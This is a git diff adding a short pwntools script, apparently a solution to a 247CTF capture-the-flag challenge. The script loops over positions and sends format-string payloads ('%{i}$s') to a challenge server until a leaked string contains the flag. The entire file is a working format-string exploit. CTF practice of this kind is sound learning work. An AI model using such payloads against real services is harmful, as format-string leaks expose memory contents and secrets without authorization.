diff --git a/247ctf/confused_environment_read/a.py b/247ctf/confused_environment_read/a.py
new file mode 100644
index 0000000..d428486
--- /dev/null
+++ b/247ctf/confused_environment_read/a.py
@@ -0,0 +1,25 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.log_level = 'error'
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+for i in range(1, 100):
+	r = remote("5108fea3f4263a9f.247ctf.com", 50099)
+	buf = f"%{i}$s".encode()
+	try:
+		s(buf)
+		r.recvuntil(b"back ")
+		out = r.recvlineS()
+		if "247CTF" in out:
+			print(out)
+			break
+	except:
+		pass
+	r.close()
+
+r.interactive()
\ No newline at end of file